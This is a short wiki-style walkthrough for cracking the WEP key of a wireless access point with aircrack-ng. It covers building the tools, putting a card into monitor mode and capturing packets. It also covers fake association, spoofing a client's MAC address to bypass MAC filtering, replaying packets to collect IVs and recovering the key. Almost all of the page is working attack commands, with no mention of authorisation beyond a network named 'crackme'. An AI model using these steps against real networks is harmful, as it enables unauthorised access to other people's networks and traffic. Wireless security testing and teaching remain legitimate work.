Cracking A WEP Key

From Nearline Storage
  • Download aircrack-ng source
 svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
  • Change ~/src/aircrack-ng/common.mak:
 CFLAGS          ?= -g -W -Wall -Werror -fno-strict-aliasing -O3
  • Compile and install:
 make && sudo make install
  • Use kismet to find the channel (11), ESSID (crackme), and BSSID (00:18:4D:85:65:4F) of the access point to be cracked

These tools are fussy about the hex addresses: include leading zeros and don't use lower-case hex digits.

  • Become root:
 su -
  • Put NIC into monitor mode:
 airmon-ng start wlan0
  • Start capturing packets:
 airodump-ng -w dumpfile -c 11 -i mon0

New terminal session:

  • Associate with the target AP
 /usr/local/sbin/aireplay-ng -1 0 -e crackme -a 00:18:4D:85:65:4F -h 00:01:02:03:04:05 mon0

If that doesn't associate successfully, it may be that MAC filtering is turned on. Watch the airodump-ng output for a while until you see a client associate successfully, then take its MAC address and substitute it for the -h value.

  • Start replaying captured packets so that the access point generates more traffic for us to collect:
 /usr/local/sbin/aireplay-ng -3 -e crackme -a 00:18:4D:85:65:4F -h 00:01:02:03:04:05 mon0

Watch the Data column in the airodump-ng session; we want more than 100,000 unique IVs before attempting the crack.

  • Ctrl-C the dump process and crack the key:
 aircrack-ng dumpfile.ivs